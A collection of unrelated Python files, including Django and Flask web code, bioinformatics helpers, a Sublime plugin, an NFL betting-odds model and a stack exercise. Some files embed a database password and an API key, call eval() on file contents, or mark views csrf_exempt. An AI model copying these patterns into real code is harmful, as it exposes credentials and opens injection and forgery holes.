'TRAJ34', 'TRAJ35', 'TRAJ36', 'TRAJ37', 'TRAJ38', 'TRAJ39', 'TRBJ2-2P', 'IGKJ1', 'IGKJ2', 'IGKJ3', 'IGKJ4', 'IGKJ5', 'TRBJ1-6', \
'TRBJ1-5', 'TRBJ1-4', 'TRBJ1-3', 'TRBJ1-2', 'TRBJ1-1', 'TRAJ29', 'TRAJ28', 'TRAJ27', 'TRAJ26', 'TRAJ25', 'TRAJ24', 'TRAJ23', 'TRAJ22', \
'TRAJ21', 'TRAJ20', 'mIGKJ4', 'mIGKJ5', 'mIGKJ1', 'mIGKJ2', 'mIGKJ3', 'mIGLJ3P', 'TRBJ2-3', 'TRAJ58', 'TRAJ59', 'TRAJ52', 'TRAJ53', \
'TRAJ50', 'TRAJ51', 'TRAJ56', 'IGLJ2/3', 'TRAJ54', 'TRAJ55', 'TRGJP', 'TRDJ4', 'TRDJ1', 'TRDJ3', 'TRDJ2', 'TRAJ49', 'TRAJ48', 'TRAJ41', \
'TRAJ40', 'TRAJ43', 'TRAJ42', 'TRAJ45', 'TRAJ44', 'TRAJ47', 'TRAJ46', 'IGLJ1', 'IGLJ7', 'IGLJ6', 'IGLJ5', 'IGLJ4', 'mIGHJ3', 'mIGHJ2',\
'mIGHJ1', 'mIGHJ4', 'IGHJ2P', 'TRGJ1', 'TRGJ2', 'IGHJ6', 'IGHJ5', 'IGHJ4', 'IGHJ3', 'IGHJ2', 'IGHJ1', 'TRAJ4', 'TRAJ5', 'TRAJ6', 'TRAJ7', \
'TRAJ1', 'TRAJ2', 'TRAJ3', 'TRAJ8', 'TRAJ9', 'TRAJ61', 'TRAJ60', 'mIGLJ4', 'mIGLJ3', 'mIGLJ2', 'mIGLJ1', 'TRAJ16', 'TRAJ17', 'TRAJ14',\
'TRAJ15', 'TRAJ12', 'TRAJ13', 'TRAJ10', 'TRAJ11', 'TRAJ18', 'TRAJ19', 'IGHJ3P', 'TRGJP2', 'TRGJP1']
return pd.DataFrame(np.zeros((len(V_names),len(J_names))),index=V_names,columns=J_names)
def calculate_tree_size(rep_obj, pruned=False):
if pruned==False: dictionary = rep_obj.tree_dict
if pruned==True: dictionary = rep_obj.pruned_tree_dict
tree_size_DF = Make_VJ_Matrix()
for vj_pair in dictionary:
V = vj_pair.split('_')[0]
J = vj_pair.split('_')[1]
tree_size_DF[J].loc[V] = len(dictionary[vj_pair].get_descendants())
tree_size_dict = tree_size_DF.to_dict()
return tree_size_dict
def calculate_cdr_lengths(obj_dict, cdr='cdr3'):
len_dict = {}
for obj in obj_dict:
cdr_len = len(str(obj_dict[obj].cdr3))
if cdr_len not in len_dict:
len_dict[cdr_len] = 1
else:
len_dict[cdr_len]+=1
return len_dict
def avg_node_mutation_length(tree_dict):
tree_mutation_dict = {}
for key in tree_dict:
ls = []
for node in tree_dict[key].iter_descendants():
ls.append(len(node.mutations))
tree_mutation_dict[key] = [np.mean(ls), np.std(ls)]
return tree_mutation_dict
def generations(tree_dict):
node_generations = {}
for key in tree_dict:
node_generations[key] = tree_dict[key].get_farthest_node()[1]
return node_generations
def calculate_vj_shm(vj_clones):
sh_means = {}
sh_stdevs = {}
for vj in vj_clones:
# print vj_clones[vj]
all_sh = []
for clone in vj_clones[vj]:
all_sh.append(vj_clones[vj][clone].sh)
sh_means[vj] = np.array(all_sh).mean()
sh_stdevs[vj] = np.array(all_sh).std()
return sh_means, sh_stdevs
def leafiness_matrix(tree_dict):
leaf_size_DF = Make_VJ_Matrix()
for vj_pair in tree_dict:
V = vj_pair.split('_')[0]
J = vj_pair.split('_')[1]
leaf_size_DF[J].loc[V] = float(len(tree_dict[vj_pair]))/len(tree_dict[vj_pair].get_descendants())
leaf_size_dict = leaf_size_DF.to_dict()
return leaf_size_dict
def leafiness_global(tree_dict):
ls = []
for vj_pair in tree_dict:
leaves = len(tree_dict[vj_pair])
size = len(tree_dict[vj_pair].get_descendants())
ls.append(float(leaves)/float(size))
return {'max': max(ls), 'avg': np.average(ls), 'std': np.std(ls), 'list': ls}
def generations_matrix(generations_dict):
generations_DF = Make_VJ_Matrix()
for vj_pair in generations_dict:
V = vj_pair.split('_')[0]
J = vj_pair.split('_')[1]
generations_DF[J].loc[V] = generations_dict[vj_pair]
generations_dict = generations_DF.to_dict()
return generations_dict
def generations_global(generations_dict):
ls = []
for vj_pair in generations_dict:
ls.append(generations_dict[vj_pair])
return {'max': max(ls), 'avg': np.average(ls), 'std': np.std(ls), 'list': ls}
def diversity_matrix(tree_size_dict, vj_freqs_dict):
diversity_DF = Make_VJ_Matrix()
tree_size_DF = pd.DataFrame(tree_size_dict)
for vj_pair in vj_freqs_dict:
V = vj_pair.split('_')[0]
J = vj_pair.split('_')[1]
diversity_DF[J].loc[V] = float(tree_size_DF[J].loc[V])/vj_freqs_dict[vj_pair]
diversity_dict = diversity_DF.to_dict()
return diversity_dict
def diversity_global(tree_size_dict, vj_freqs_dict):
ls = []
tree_size_DF = pd.DataFrame(tree_size_dict)
for vj_pair in vj_freqs_dict:
V = vj_pair.split('_')[0]
J = vj_pair.split('_')[1]
ls.append(float(tree_size_DF[J].loc[V])/vj_freqs_dict[vj_pair])
return {'max': max(ls), 'avg': np.average(ls), 'std': np.std(ls), 'list': ls}
def d50(clones, num_Reads):
d50_amount = num_Reads/2
read_count=0
for i in clones:
read_count+=clones[i].num_reads
if read_count>=d50_amount:
return i/float(len(clones))
def CDR3_global(clone_CDR3_lengths):
ls = []
for length in clone_CDR3_lengths:
for i in range(clone_CDR3_lengths[length]):
ls.append(np.float64(length))
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.http import HttpResponse
from django.views.decorators.csrf import csrf_exempt
from django.shortcuts import render
from rest_framework.parsers import JSONParser
from rest_framework.renderers import JSONRenderer
from apiREST.models import *
from apiREST.serializers import *
# Create your views here.
#-------------------------------UTILS-------------------------------
class JSONResponse(HttpResponse):
def __init__(self, data, **kwargs):
content = JSONRenderer().render(data)
kwargs['content_type'] = 'application/json; charset=utf-8'
super(JSONResponse, self).__init__(content,**kwargs)
def consoleLog(text='Información',data= ''):
print('########## {text} : {data} ##########'.format(text=text, data=data))
@csrf_exempt
def scenarios(request):
stages = [state.as_dict() for state in Stage.objects.all().order_by('order')]
# stages = [state.as_dict() for state in Stage.objects.all().filter(order__in=[1])]
return JSONResponse(stages)
@csrf_exempt
def characters(request):
characters = [character.as_dict() for character in Character.objects.all()]
return JSONResponse(characters)
#-------------------------------PLAYER-------------------------------
@csrf_exempt
def player_list(request):
"""
List all code player_list, or create a new player_list.
"""
rows = request.GET.get('rows',10)
if request.method == 'GET':
players = [player.as_dict() for player in Player.objects.all().order_by('-score')[0:int(rows)]]
return JSONResponse(players)
elif request.method == 'POST':
data = JSONParser().parse(request)
serializer = PlayerSerializer(data=data)
if serializer.is_valid():
serializer.save()
job_request = JobRequest.objects.get(pk = serializer.data['id'])
return JSONResponse(data, status=201)
print(serializer.errors)
return JSONResponse(serializer.errors, status=400)
else:
return HttpResponse(405)
|
import itertools
from django.contrib.auth.models import Group, Permission
from django.contrib.contenttypes.fields import GenericForeignKey
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import ValidationError
from django.core.urlresolvers import reverse
from django.core.validators import URLValidator
from django.db import models
from django.utils.text import slugify
from django.utils.translation import ugettext_lazy as _
from mptt.models import MPTTModel, TreeForeignKey
from .managers import ItemManager
class ItemBase(MPTTModel):
"""
Model managing the items without tree inheritance and providing the basic fields and behaviours.
For the hierarchy of items, the class is using the 'mptt' module, see https://django-mptt.github.io/django-mptt/
Each item has a url associated that generates a href at save. This behaviour is used to optimize the processing
required in case the field uses complex value like django url pattern.
"""
parent = TreeForeignKey(
blank=True,
db_index=True,
null=True,
related_name='children',
to='self')
name = models.CharField(
_('Name'), max_length=255)
slug = models.SlugField(unique=True, verbose_name=_(u'Slug'), max_length=150)
url = models.CharField(
_('Url'), blank=True, null=True, max_length=255)
content_type = models.ForeignKey(ContentType, null=True, blank=True)
object_id = models.PositiveIntegerField(null=True, blank=True)
content_object = GenericForeignKey('content_type', 'object_id')
href = models.CharField(
_('Link'), blank=True, null=True, max_length=255)
access_loggedin = models.BooleanField(
_('Logged in only'),
help_text=_('Check it to grant access to this item to authenticated users only.'),
db_index=True, default=False)
access_group = models.ManyToManyField(
Group, verbose_name=_('User must belong to one of these groups'), blank=True)
access_permissions = models.ManyToManyField(
Permission, verbose_name=_('User must have one of these permissions'), blank=True)
css_class = models.CharField(
_('Css class'), blank=True, null=True, max_length=100, help_text=_('Specify a css class.'))
is_new_tab = models.BooleanField(
_('New tab'), db_index=True, default=False,
help_text=_('The link should open in a new tab.'))
objects = ItemManager()
class Meta:
abstract = True
verbose_name = _(u"navigation item")
verbose_name_plural = _(u"navigation items")
def __unicode__(self):
return self.name
def __str__(self):
return self.__unicode__()
def url_is_valid(self):
"""
Checks if the 'url' property of the object is a valid url.
:returns: bool -- the url is valid or not.
"""
if self.url:
val = URLValidator()
try:
val(self.url)
return True
except ValidationError:
pass
return False
def url_is_pattern(self):
"""
Checks if the 'url' property of the object is a django url pattern.
:returns: bool -- the url is a django url pattern or not.
"""
if self.url:
try:
reverse(self.url)
return True
except:
pass
return False
def generate_unique_slug(self):
"""
Ensures uniqueness of slug, inspired from
https://keyerror.com/blog/automatically-generating-unique-slugs-in-django
"""
unique_slug = orig = slugify(self.__str__())
for x in itertools.count(1):
if not self.__class__.objects.filter(slug=unique_slug).exists():
break
unique_slug = '%s-%d' % (orig, x)
return unique_slug
def save(self, *args, **kwargs):
"""
Overrides the parent class, mostly to generate and store the href field from the url field and
generates a slug if empty.
"""
self.href = ''
if self.url:
# First try to see if the link is a url
if self.url_is_valid():
self.href = self.url
# Otherwise check if the url is a django pattern
elif self.url_is_pattern():
self.href = reverse(self.url)
# Finally store the value if the url field looks like a relative url
elif self.url.startswith('/'):
self.href = self.url
elif self.content_object:
self.href = self.content_object.get_absolute_url()
# store the base field
if not self.slug:
self.slug = self.generate_unique_slug()
super(ItemBase, self).save(*args, **kwargs)
class Item(ItemBase):
"""
Default Item class inheriting unaltered from ItemBase.
"""
|
# Generated by Django 2.0.6 on 2018-07-01 21:41
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('solution', '0022_auto_20180701_1709'),
]
operations = [
migrations.AlterField(
model_name='project',
name='authors',
field=models.ManyToManyField(blank=True, related_name='projects', to='solution.Profile'),
),
]
|
from flask import Flask, json, Response, redirect
from flask_cors import CORS
import os
import random
import json
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
# allows redirects
CORS(app)
app.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql://postgres:G8AR7Cseu5bTh9pPttcX@localhost/flowgames'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db = SQLAlchemy(app)
# databse model
class Flow_Games(db.Model):
__tablename__ = 'games'
id = db.Column(db.Integer, primary_key=True, unique=True)
game_board = db.Column(db.JSON)
def __repr__(self):
return f'<Board: {self.id} {self.game_board}>'
@app.route('/')
def index():
return '<h1>Hello World!</h1>'
@app.route('/users/<name>')
def user(name):
return '<h1>Hello, {}!</h1>'.format(name)
@app.route('/play')
def choose_game():
game_num = random.randint(1, 5)
return redirect(f'/game/{game_num}')
@app.route('/game/<num>')
def game(num):
game = json.dumps(Flow_Games.query.filter_by(id=num).first().game_board)
return Response(game, mimetype='application/json')
if __name__ == "__main__":
app.run()
|
""" Check domains, IPs, and hosts to ensure they are "external" """
import ipaddress
import publicsuffix2
__version__ = '1.0.1'
def is_external_address(addr):
""" Similar to the ``ipaddress`` ``is_global`` property, test if the
address (given any way ``ipaddress.ip_address`` allows) is an "external"
(publically routable) address, checking the IPv4 address if it's a mapped
IPv6
Examples:
Local IPv4
>>> is_external_address('127.0.1.1')
False
Public IPv4
>>> is_external_address('8.8.8.8')
True
Local IPv6 -> IPv4 mapped address
>>> is_external_address('::ffff:127.0.0.1')
False
>>> is_external_address('::ffff:7f00:1')
False
Public IPv6 -> IPv4 mapped address
>>> is_external_address('::ffff:8.8.8.8')
True
>>> is_external_address('::ffff:808:808')
True
"""
if not isinstance(addr, (ipaddress.IPv4Address, ipaddress.IPv6Address)):
addr = ipaddress.ip_address(addr)
try:
mapped = addr.ipv4_mapped
except AttributeError:
pass
else:
if mapped:
addr = mapped
return addr.is_global
_PSL = None
def is_external_domain(domain):
""" Test if the domain is an "external" domain.
An external domain is classified as any child of a public suffix
Examples:
>>> is_external_domain('google.com')
True
>>> is_external_domain('tehunoth.com')
True
>>> is_external_domain('localhost')
False
>>> is_external_domain('tneohu')
False
>>> is_external_domain('test.cluster.local')
False
Controvertial, but thanks to Google this is a thing
>>> is_external_domain('web.dev')
True
"""
parts = domain.strip('.').rsplit('.', 1)
try:
(_, suffix) = parts
except ValueError:
(suffix,) = parts
global _PSL
_PSL = _PSL or publicsuffix2.PublicSuffixList()
try:
_PSL.root[1][suffix]
except KeyError:
return False
else:
return True
def is_external_host(host):
""" Takes a host, and checks that it's external either via IP reservation
checking, or via domain public suffix checking
Examples:
>>> is_external_host('google.com')
True
>>> is_external_host('8.8.8.8')
True
>>> is_external_host('::ffff:8.8.8.8')
True
>>> is_external_host('::ffff:808:808')
True
>>> is_external_host('localhost')
False
>>> is_external_host('192.168.100.2')
False
>>> is_external_host('::ffff:192.168.100.2')
False
>>> is_external_host('::ffff:c0a8:6402')
False
"""
try:
ipaddress.ip_address(host)
except ValueError:
return is_external_domain(host)
else:
return is_external_address(host)
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
__author__ = 'huangbinghe@gmail.com'
import sublime
import sublime_plugin
from collections import Counter
class MaxCountCommand(sublime_plugin.TextCommand):
def run(self, edit, without_empty_line=1):
setting = sublime.load_settings("HBH-Rows.sublime-settings")
# 获取页面内容
content = self.view.substr(sublime.Region(0, self.view.size()))
lines = content.split('\n')
print(lines)
if without_empty_line:
lines = filter(lambda x: x,lines)
print(lines)
cnt = Counter(lines)
print(cnt)
print(cnt.most_common(1))
max_line = cnt.most_common(1)[0]
max_line_str = ':'.join(map(str,max_line))
print(max_line_str)
self.view.replace(edit,sublime.Region(0, self.view.size()),max_line_str)
class RepeatLinesCommand(sublime_plugin.TextCommand):
def run(self, edit, repeat_count=2, without_empty_line=1):
setting = sublime.load_settings("HBH-Rows.sublime-settings")
# 获取页面内容
content = self.view.substr(sublime.Region(0, self.view.size()))
lines = content.split('\n')
print(lines)
if without_empty_line:
lines = filter(lambda x: x,lines)
print(lines)
cnt = Counter(lines)
print(cnt)
repeat_lines = []
for s,c in cnt.items():
if c < repeat_count:
continue
repeat_lines.append((s,c))
repeat_lines = sorted(repeat_lines,key=lambda x:x[1],reverse=1)
print(repeat_lines)
repeat_lines_str = '\n'.join(map(lambda x:'{}:{}'.format(x[0],x[1]),repeat_lines))
self.view.replace(edit,sublime.Region(0, self.view.size()), repeat_lines_str)
class MergeLinesCommand(sublime_plugin.TextCommand):
def run(self, edit):
setting = sublime.load_settings("HBH-Rows.sublime-settings")
# 获取页面内容
content = self.view.substr(sublime.Region(0, self.view.size()))
lines = content.split('\n')
print(lines)
content_lines = []
n = 1
for line in lines:
if len(content_lines) < n:
content_lines.append([])
if not line:
n += 1
continue
content_lines[n-1].append(line)
content_lines = list(filter(lambda x: x,content_lines))
print(content_lines)
content_lines = list(zip(*content_lines))
print(content_lines)
merge_lines_str = '\n'.join(map(lambda x:','.join(x),content_lines))
print(merge_lines_str)
self.view.replace(edit,sublime.Region(0, self.view.size()), merge_lines_str) |
from urllib import request
from bs4 import BeautifulSoup
import json
from pprint import pprint
from scipy import stats
from utils import truncate
#############
### Setup ###
#############
teams = ['SF', 'CHI', 'CIN', 'BUF', 'DEN', 'CLE', 'TB', 'ARI',
'SD', 'KC', 'IND', 'DAL', 'MIA', 'PHI', 'ATL', 'NYG',
'JAX', 'NYJ', 'DET', 'GB', 'CAR', 'NE', 'OAK', 'STL',
'BAL', 'WAS', 'NO', 'SEA', 'PIT', 'HOU', 'TEN', 'MIN']
teams.sort()
api_key = 'b7d211fd970143a2940d9905fe5c2447'
url_form_stats = 'http://api.nfldata.apiphany.com/trial/json/TeamSeasonStats/2013?subscription-key=b7d211fd970143a2940d9905fe5c2447'
url_form_sched = 'http://api.nfldata.apiphany.com/trial/json/Schedules/2015?subscription-key=b7d211fd970143a2940d9905fe5c2447'
#################################
### Data Extraction Functions ###
#################################
## These functions extract the NFL team performance data from external API's and save them to local text files to
## avoid having to poing the API. The YEAR argument can be entered as an int and the TEAM argument can be entered
## as a string abbreviation as seen in the teams array in Setup. With much more experience now than at the time,
## I would add simple MongoDB integration as I worked in JSON format and extensively with dictionaries. This would
## also allow me to avoid using 'eval' which I now know is frowned upon.
def pullSeasonData(year):
file = open("NFLstats" + str(year % 100).zfill(2) + ".txt", "w")
url = 'http://api.nfldata.apiphany.com/trial/json/TeamSeasonStats/' + year + '?subscription-key=b7d211fd970143a2940d9905fe5c2447'
obj = request.urlopen(url)
data = str(json.load(obj))
file.write(data)
file.close()
def pullSeasonSchedule(year):
file = open("NFLsched" + str(year % 100).zfill(2) + ".txt", "w")
url = 'http://api.nfldata.apiphany.com/trial/json/Schedules/' + year + '?subscription-key=b7d211fd970143a2940d9905fe5c2447'
obj = request.urlopen(url)
data = str(json.load(obj))
file.write(data)
file.close()
def getTeamSchedule(team,year):
data_file = open("NFLsched" + str(year % 100).zfill(2) + ".txt", "r+")
data = eval(data_file.read())
schedule = []
for item in data:
if item["HomeTeam"] == team:
schedule.append(str(item["AwayTeam"]))
elif item["AwayTeam"] == team:
schedule.append(str(item["HomeTeam"]))
data_file.close()
return schedule
def getLocationSchedule(team,year):
data_file = open("NFLsched" + str(year % 100).zfill(2) + ".txt", "r+")
data = eval(data_file.read())
location = []
for item in data:
if item["HomeTeam"] == team:
location.append("H")
elif item["AwayTeam"] == team:
location.append("A")
data_file.close()
return location
#returns home/away in order as a list which can be iterated over
#####################################
### Qualitative Factors Functions ###
#####################################
## The functions in this section look to use qualitative factors such as personnel changes, injuries,
## coaching changes, etc... to develop position group power rankings which are used to provide quantitative
## performance boosts or costs into the coming year. This is a way of translating last year's performance
## statistics into this year's projections.
def assignOffensiveRatings(year):
scale = {"Coaching": 25, "QB": 25, "O-Line": 20, "WR/TE": 15, "RB": 15}
data_file = open("TeamRankings" + str(year % 100).zfill(2) + ".txt", "r+")
data = eval(data_file.read())
offensiveRatings = {}
for team in teams:
coachingScore = ((data[teams.index(team)]["Coaching"] / 5.0) * scale["Coaching"])
qbScore = ((data[teams.index(team)]["QB"] / 5.0) * scale["QB"])
oLineScore = ((data[teams.index(team)]["O-Line"] / 5.0) * scale["O-Line"])
wrTeScore = ((data[teams.index(team)]["WR/TE"] / 5.0) * scale["WR/TE"])
rbScore = ((data[teams.index(team)]["RB"] / 5.0) * scale["RB"])
offensiveRatings[team] = int(coachingScore + qbScore + oLineScore + wrTeScore + rbScore)
data_file.close()
return offensiveRatings
def offensiveBoosts(prev_year, proj_year):
prevYearOffensiveRatings = assignOffensiveRatings(prev_year)
projYearOffensiveRatings = assignOffensiveRatings(proj_year)
offensiveBoosts = {}
for team in teams:
offensiveBoosts[team] = ((projYearOffensiveRatings[team] - prevYearOffensiveRatings[team]) / 100.0)
return offensiveBoosts
# returns boosts in terms of positive or negative percent indicating an improvement or worsening of personnel/injuries
def assignDefensiveRatings(year):
scale = {"Coaching": 25, "Secondary": 25, "LB": 25, "D-Line": 25}
data_file = open("TeamRankings" + str(year % 100).zfill(2) + ".txt", "r+")
data = eval(data_file.read())
defensiveRatings = {}
for team in teams:
coachingScore = ((data[teams.index(team)]["Coaching"] / 5.0) * scale["Coaching"])
secondaryScore = ((data[teams.index(team)]["Secondary"] / 5.0) * scale["Secondary"])
lbScore = ((data[teams.index(team)]["LB"] / 5.0) * scale["LB"])
dLineScore = ((data[teams.index(team)]["D-Line"] / 5.0) * scale["D-Line"])
defensiveRatings[team] = int(coachingScore + secondaryScore + lbScore + dLineScore)
data_file.close()
return defensiveRatings
def defensiveBoosts(prev_year, proj_year):
prevYearDefensiveRatings = assignDefensiveRatings(prev_year)
projYearDefensiveRatings = assignDefensiveRatings(proj_year)
defensiveBoosts = {}
for team in teams:
defensiveBoosts[team] = ((projYearDefensiveRatings[team] - prevYearDefensiveRatings[team]) / 100.0)
return defensiveBoosts
# returns boosts in terms of positive or negative percent indicating an improvement or worsening of personnel/injuries
######################################
### Quantitative Factors Functions ###
######################################
## Here we dive into the performance stats and develop a method to handicap games or, in other words, calculate
## the spreads which drive our probabilistic distributions. The primary stat used is YARDS PER POINT which can be
## used to calculate offensive and defensive efficiency. The qualitative rankings in the previous section go
## toward adjusting the YARDS PER POINT SPREAD based on perceived improvements or declines in qualitative
## performance metrics. The last function here lays out a method to calculate the PER GAME win probability for
## a mathchup using YPP Spreads.
def assignOffensiveYPP(year):
stats_file = open("NFLstats" + str((year - 1) % 100).zfill(2) + ".txt", "r")
stats = eval(stats_file.read())
offensiveBoost = offensiveBoosts(year -1 , year)
offensiveYPP = {}
for team in teams:
offensiveYPP[team] = round(((1 - offensiveBoost[team]) * ((stats[teams.index(team)]["OffensiveYards"] + 0.0) / (stats[teams.index(team)]["Score"]))), 2)
stats_file.close()
return offensiveYPP
def assignDefensiveYPP(year):
stats_file = open("NFLstats" + str((year - 1) % 100).zfill(2) + ".txt", "r")
stats = eval(stats_file.read())
defensiveBoost = defensiveBoosts(year - 1, year)
defensiveYPP = {}
for team in teams:
defensiveYPP[team] = round(((1 + defensiveBoost[team]) * ((stats[teams.index(team)]["OpponentOffensiveYards"] + 0.0) / (stats[teams.index(team)]["OpponentScore"]))), 2)
stats_file.close()
return defensiveYPP
def assignYPPspread(year):
stats_file = open("NFLstats" + str((year - 1) % 100).zfill(2) + ".txt", "r")
stats = eval(stats_file.read())
YPPspread = {}
offensiveYPP = assignOffensiveYPP(year)
defensiveYPP = assignDefensiveYPP(year)
for team in teams:
YPPspread[team] = round((defensiveYPP[team] - offensiveYPP[team]), 2)
stats_file.close()
return YPPspread
def gameWinProbability(year,team,opponent):
YPPspread = assignYPPspread(year)
schedule = getTeamSchedule(team,year)
location = getLocationSchedule(team,year)
if location[schedule.index(opponent)] == "H":
line = ((YPPspread[team] - YPPspread[opponent]) + 1.5)
elif location[schedule.index(opponent)] == "A":
line = ((YPPspread[team] - YPPspread[opponent]) - 1.5)
distribution = stats.norm(line,13)
winProbability = round((1 - distribution.cdf(0)), 2)
return winProbability
##################################################
### Vegas Odds/Lines Data Extraction Functions ###
##################################################
## This is another data extraction section. I use a custom built web scraper to collect Odds/Lines
## from Vegas Bookies. Web Scraping is a variable process involving trial and error so a large
## challenge is isolating the data you need and formatting it for efficienct use within the program.
## We do that here and then lastly, use the over/under odds data to calculate the implied probabilities
## Vegas is showing for teams finishing above/below the line (Vegas's expected win total).
def assignOdds(data):
teams_unsorted = ['SF', 'CHI', 'CIN', 'BUF', 'DEN', 'CLE', 'TB', 'ARI',
'SD', 'KC', 'IND', 'DAL', 'MIA', 'PHI', 'ATL', 'NYG',
'JAX', 'NYJ', 'DET', 'GB', 'CAR', 'NE', 'OAK', 'STL',
'BAL', 'WAS', 'NO', 'SEA', 'PIT', 'HOU', 'TEN', 'MIN']
team_info = {}
for team in teams_unsorted:
team_data = data.pop(0)
if team_data[0] == 'Chiefs':
team_info[team] = [float(team_data[1]), int(team_data[3][:4]), int(team_data[6][:4])]
elif len(team_data) == 10:
team_info[team] = [float(team_data[1]), int(team_data[4][:4]), int(team_data[6][:4])]
elif len(team_data) == 11:
team_info[team] = [float(team_data[1]), int(team_data[4][:4]), int(team_data[7][:4])]
return team_info
def oddsScraper():
url = "http://linemakers.sportingnews.com/article/4635972-nfl-win-totals-2015-season-vegas-odds-seahawks-patriots-cowboys-saints-broncos"
content = request.urlopen(url)
html = content.read()
soup = BeautifulSoup(html, "html.parser")
info_location = soup.find_all('div', {'class': 'entry-content'})
general_odds_section = info_location[0].find_all('p')
odds_data = general_odds_section[4].find_all('br')
relevant_data = odds_data[0].get_text()
formatted_data = relevant_data.split('\n')
split_data = [item.split(" ") for item in formatted_data if item]
return assignOdds(split_data)
## Returned in format {team: [expectedWins, 'Over', 'Under']} ##
def vegasProbabilites(teamOdds):
for team in teamOdds:
over = teamOdds[team][1]
under = teamOdds[team][2]
if over < 0:
teamOdds[team][1] = round(((-(over)) / ((-(over)) + 100.0 )), 2)
else:
teamOdds[team][1] = round((100.0 / (over + 100)), 2)
if under < 0:
teamOdds[team][2] = round(((-(under)) / ((-(under)) + 100.0 )), 2)
else:
teamOdds[team][2] = round((100.0 / (under + 100)), 2)
return teamOdds
######################
### Main Functions ###
######################
## This section is the real functionality of the program. We use our statistical spreads to calculate the
## win probabilite for every team in every game they play that year. We then sum up those probabilities,
## as dictated by the method of indicators, to determine the expected win total for each team in the coming
## year. Our per game scoring distribution is normal with mean derived from our YPP spreading technique, and
## standard deviation obtained through research into how games have unfolded in the past, namely through
## academic papers. Our next steps are to determine the probability of our expected win scenario occurring under
## the implied Vegas Distribition for win totals which we obtained in the last section. With these calculations,
## we can find the edge in certain bets and make recommendations on whether to take the over or under bet.
## Of note is that if our predicted win total and the Vegas predicted win total differs by less than 1.5 games,
## we conclude that there is no edge to be had in the bet. Recommendations are returned as a dict with all the
## relevant information.
def expectedWins(year):
YPPspread = assignYPPspread(year)
expectedWins = {}
for team in teams:
schedule = getTeamSchedule(team,year)
location = getLocationSchedule(team,year)
winProbabilities = []
for opponent in schedule:
if opponent == "BYE":
winProbabilities.append(0.0)
else:
if location[schedule.index(opponent)] == "H":
line = ((YPPspread[team] - YPPspread[opponent]) + 1.5)
elif location[schedule.index(opponent)] == "A":
line = ((YPPspread[team] - YPPspread[opponent]) - 1.5)
distribution = stats.norm(line,13)
winProbabilities.append(round((1 - distribution.cdf(0)), 2))
expectedWins[team] = int(round(sum(winProbabilities), 0))
return expectedWins
def compareProbabilities(year):
## Expectation of a normal random variable suggests 50/50 over/under probabilites ##
teamWins = expectedWins(year)
teamOdds = oddsScraper()
vegasImpliedProbs = vegasProbabilites(teamOdds)
vegasValgoProbabilities = {}
for team in teamWins:
vegasExpectation = vegasImpliedProbs[team][0]
vegasDistribution = stats.norm(vegasExpectation, 2.5)
againstVegasUnderProbability = float(truncate(vegasDistribution.cdf(teamWins[team]), 2))
againstVegasOverProbability = float(truncate(1 - againstVegasUnderProbability, 2))
vegasValgoProbabilities[team] = [vegasImpliedProbs[team][0], againstVegasOverProbability, againstVegasUnderProbability]
return vegasValgoProbabilities, teamWins
def generalRecommendations(year):
algoProbabilites, algoWins = compareProbabilities(year)
recommendations = {}
for team in algoProbabilites:
if abs(algoProbabilites[team][0] - algoWins[team]) < 1.5:
recommendations[team] = {"Algo Expected Wins": algoWins[team],
"Vegas Wins": algoProbabilites[team][0],
"Recommendation": "Avoid",
"Edge": "Minimal/None"}
elif algoProbabilites[team][1] < 0.50:
recommendations[team] = {"Algo Expected Wins": algoWins[team],
"Vegas Wins": algoProbabilites[team][0],
"Recommendation": "Over",
"Edge": truncate((algoProbabilites[team][2] - 0.50) * 100, 2) + "%"}
elif algoProbabilites[team][1] > 0.50:
recommendations[team] = {"Algo Expected Wins": algoWins[team],
"Vegas Wins": algoProbabilites[team][0],
"Recommendation": "Under",
"Edge": truncate((algoProbabilites[team][1] - 0.50) * 100, 2) + "%"}
return recommendations
if __name__ == '__main__':
year = int(input("Enter current year to see betting recommendations: "))
pprint(generalRecommendations(year), width=1)
## In this GitHUb demo, there is only support for the 2015 season. If you pip install the dependencies, run the program,
## and enter 2015, you should get the right bet predictions. Feel free to add to the code or make changes on a separate
## branch. This was my first ever actual functional Python Program. It was a lot of fun. Perhaps if I developed it now,
## with more experience under my belt it would look different. I would use OO design, database integration, and try to
## research into more advanced mathematica methods to make predictions. Current coaches examine stats on a rolling 4 week
## basis. I was thinking of turning this into a week to week betting app where stats over a rolling 4 week period are
## analyzed and bets are recommended through analysis of the most recent performance statistics.
|
from collections import deque
from typing import Deque
class SetOfStacks:
def __init__(self, capacity):
self.set_of_stacks = []
self.capacity = capacity
def getLastStack(self):
return self.set_of_stacks[-1] if self.set_of_stacks != [] else Deque()
def push(self, data):
current_stack = self.getLastStack()
is_stack_full = len(current_stack) == self.capacity
if (self.set_of_stacks != [] and is_stack_full != True):
current_stack.append(data)
else:
current_stack = Deque()
self.set_of_stacks.append(current_stack)
current_stack = self.getLastStack() # remove this line
current_stack.append(data)
def pop(self):
current_stack = self.getLastStack()
if (self.set_of_stacks == []):
print("Stack Underflow!")
return
popped_element = current_stack.pop()
is_stack_empty = len(current_stack) == 0
if is_stack_empty:
self.set_of_stacks.pop()
return popped_element
def popAt(self, index):
if self.set_of_stacks[-1] == self.set_of_stacks[index]:
return self.pop()
else:
pointer = index
while(pointer < len(self.set_of_stacks)):
if pointer == index:
popped_element = self.set_of_stacks[index].pop()
else:
rollover_element = self.set_of_stacks[pointer].popleft()
self.set_of_stacks[pointer - 1].append(rollover_element)
pointer += 1
if self.getLastStack() == deque([]):
self.set_of_stacks.pop()
return popped_element
StackOfPlates = SetOfStacks(3)
StackOfPlates.pop()
print(StackOfPlates.set_of_stacks)
StackOfPlates.push(10)
print(StackOfPlates.set_of_stacks)
StackOfPlates.push(20)
print(StackOfPlates.set_of_stacks)
StackOfPlates.push(30)
print(StackOfPlates.set_of_stacks)
StackOfPlates.push(40)
print(StackOfPlates.set_of_stacks)
StackOfPlates.push(50)
print(StackOfPlates.set_of_stacks)
StackOfPlates.push(60)
print(StackOfPlates.set_of_stacks)
StackOfPlates.push(70)
print(StackOfPlates.set_of_stacks)
# StackOfPlates.pop()
# print(StackOfPlates.set_of_stacks)
# StackOfPlates.pop()
